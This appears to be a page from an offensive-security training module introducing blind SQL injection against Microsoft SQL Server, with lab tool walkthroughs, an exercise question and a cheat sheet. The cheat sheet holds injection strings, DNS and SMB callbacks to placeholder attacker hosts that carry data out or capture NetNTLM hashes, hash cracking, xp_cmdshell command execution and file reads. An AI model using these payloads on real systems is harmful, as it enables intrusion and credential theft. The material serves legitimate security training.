Blind SQL Injection

Introduction to MSSQL/SQL Server

Introduction

SQL is a standardized language for interacting with relational databases. The five most common (as of Dec 15, 2022) are:

In this module, we will be focusing on blind SQL injection attacks using examples in Microsoft SQL Server (MSSQL). In addition to this, we will cover MSSQL-specific attacks. As SQL is standardized, the attacks taught in this module may be easily adapted to work against other relational databases.

Interacting with MSSQL

Although we will be dealing with injection vulnerabilities through websites for the rest of this module, it is helpful to understand how to interact with MSSQL/SQLServer directly, be it through a command line or GUI application.

Note: As this is an advanced SQL module, it is expected that you already understand the basics of SQL and are comfortable building queries yourself.

SQLCMD (Windows, Command Line)

SQLCMD is a command-line tool for Windows developed by Microsoft for interacting with MSSQL.

To connect to a SQL Server we can use the following syntax. In this case, we are connecting to the bsqlintro database on the server SQL01 with the credentials thomas:TopSecretPassword23!. The last flag (-W) removes trailing spaces, which makes the output a bit easier to read.

PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1>

To run SQL queries, simply enter them and type GO (which is the default batch separator) at the end to run. In this example we select all table information, and then the top 5 posts from the users table joined with the posts table.

PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1> SELECT *
2> FROM INFORMATION_SCHEMA.TABLES;
3> GO
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
bsqlintro dbo users BASE TABLE
bsqlintro dbo posts BASE TABLE

(2 rows affected)
1> SELECT TOP 5 users.firstName, users.lastName, posts.title
2> FROM users
3> JOIN posts
4> ON users.id=posts.authorId;
5> GO
firstName lastName title
--------- -------- -----
Edward Strong Voluptatem neque labore dolore velit ut.
David Ladieu Etincidunt etincidunt adipisci sed consectetur.
Natasha Ingham Aliquam quiquia velit non aliquam sed sit etincidunt.
Jessica Fitzpatrick Dolor porro quiquia labore numquam numquam sit.
Mary Evans Tempora sed velit consectetur labore consectetur.

(5 rows affected)

Impacket-MSSQLClient (Linux, Command Line)

MSSQLClient.py (or impacket-mssqlclient) is part of the Impacket toolset which comes preinstalled on many security-related linux distributions. We can use it to interact with remote MSSQL without having to use Windows.

The syntax to connect looks like this:

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro

We can run queries as usual:

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;

TABLE_CATALOG                                                          TABLE_SCHEMA                                                          TABLE_NAME                                                          TABLE_TYPE

-----------------------------------------------------------   -----------------------------------------------------------   -----------------------------------------------------------   -----------------------------------------------------------

bsqlintro                                                           dbo                                                               users                                                          b'BASE TABLE'   

bsqlintro                                                           dbo                                                               posts                                                          b'BASE TABLE'   


SQL> SELECT TOP 5 users.firstName, users.lastName, posts.title FROM users JOIN posts ON users.id=posts.authorId;

firstName                                                              lastName                                                              title

-----------------------------------------------------------   -----------------------------------------------------------   -----------------------------------------------------------   

b'Edward'                                                          b'Strong'                                                          b'Voluptatem neque labore dolore velit ut.'

b'David'                                                           b'Ladieu'                                                          b'Etincidunt etincidunt adipisci sed consectetur.'

b'Natasha'                                                         b'Ingham'                                                          b'Aliquam quiquia velit non aliquam sed sit etincidunt.'

b'Jessica'                                                         b'Fitzpatrick'                                                     b'Dolor porro quiquia labore numquam numquam sit.'

b'Mary'                                                            b'Evans'                                                           b'Tempora sed velit consectetur labore consectetur.'

SQL> exit

Since MSSQLClient.py is a pen-testing tool, it has a couple of features that help us when attacking MSSQL servers. For example, we can enable and use xp_cmdshell to run commands. We will cover this later on in the module.

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(SQL01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SQL01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
exitoutput                                                                             

--------------------------------------------------------------------------------   

NT SERVICE\mssqlserver

NULL                                                                               

SQL> exit

SQL Server Management Studio (Windows, GUI)

SQL Server Management Studio is a GUI tool developed by Microsoft for interacting with MSSQL. When launching the application we are prompted to connect to a server:

After connecting, we can view the databases in the server by opening the Databases folder.

We can list the tables by opening the specific database, and then the Tables folder.

To run queries on a database we can right-click and select New Query.

We can enter queries into the new tab, and run by clicking Execute.

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

Authenticate to with user "thomas" and password "TopSecretPassword23!"

+ 5 Find the password hash of the first user matching these criteria: (1) First name begins with an 'S' (2) Email is longer than 20 characters long (3) Wrote a post with a title beginning with the letter 'N' (4) Sorted by first name ascending.

+10 Streak pts

Go to Questions

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Defending against SQL Injection

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Boolean-based

' AND 1=1;--

Time-based

'; IF (1=1) WAITFOR DELAY '0:0:10';--

DNS OOB

SQL Function	SQL Query
`master..xp_dirtree`	`DECLARE @T varchar(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_dirtree "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_fileexist`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_fileexist "\\'+@T+'.YOUR.DOMAIN\\x"');`
`master..xp_subdirs`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);EXEC('master..xp_subdirs "\\'+@T+'.YOUR.DOMAIN\\x"');`
`sys.dm_os_file_exists`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM sys.dm_os_file_exists('\\'+@T+'.YOUR.DOMAIN\x');`
`fn_trace_gettable`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_trace_gettable('\\'+@T+'.YOUR.DOMAIN\x.trc',DEFAULT);`
`fn_get_audit_file`	`DECLARE @T VARCHAR(1024);SELECT @T=(SELECT 1234);SELECT * FROM fn_get_audit_file('\\'+@T+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`
`split result into sub-domains`	`DECLARE @T VARCHAR(MAX); DECLARE @A VARCHAR(63); DECLARE @B VARCHAR(63); SELECT @T=CONVERT(VARCHAR(MAX), CONVERT(VARBINARY(MAX), flag), 1) from flag; SELECT @A=SUBSTRING(@T,3,63); SELECT @B=SUBSTRING(@T,3+63,63); SELECT * FROM fn_get_audit_file('\\'+@A+'.'+@B+'.YOUR.DOMAIN\',DEFAULT,DEFAULT);`

[MSSQL] RCE

-- Check if we are sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Enable 'Advanced Options'
EXEC sp_configure 'Show Advanced Options', '1';
RECONFIGURE;

-- Enable 'xp_cmdshell'
EXEC sp_configure 'xp_cmdshell', '1';
RECONFIGURE;

-- Ping ourselves
EXEC xp_cmdshell 'ping /n 4 192.168.43.164';

[MSSQL] NetNTLM

[!bash!]$ sudo python3 Responder.py -I eth0

EXEC master..xp_dirtree '\\<ATTACKER_IP>\myshare', 1, 1;

[!bash!]$ hashcat -m 5600 'jason::SQL01:bd7f162c24a39a0f:94DF80C5ABB...SNIP...000000' /usr/share/wordlists/rockyou.txt

[MSSQL] File Read

-- Check if we have the permissions needed to read files
SELECT COUNT(*) FROM fn_my_permissions(NULL, 'DATABASE') WHERE permission_name = 'ADMINISTER BULK OPERATIONS' OR permission_name = 'ADMINISTER DATABASE BULK OPERATIONS';

-- Get the length of a file
SELECT LEN(BulkColumn) FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

-- Get the contents of a file
SELECT BulkColumn FROM OPENROWSET(BULK '<path>', SINGLE_CLOB) AS x

Blind SQL Injection

Introduction to MSSQL/SQL Server

Introduction

Interacting with MSSQL

SQLCMD (Windows, Command Line)

Impacket-MSSQLClient (Linux, Command Line)

SQL Server Management Studio (Windows, GUI)

Questions

Table of Contents

Introduction

Boolean-based SQLi

Time-based SQLi

MSSQL-specific Attacks

Tools of the Trade

Preventing SQL Injection Vulnerabilities

Skills Assessment

My Workstation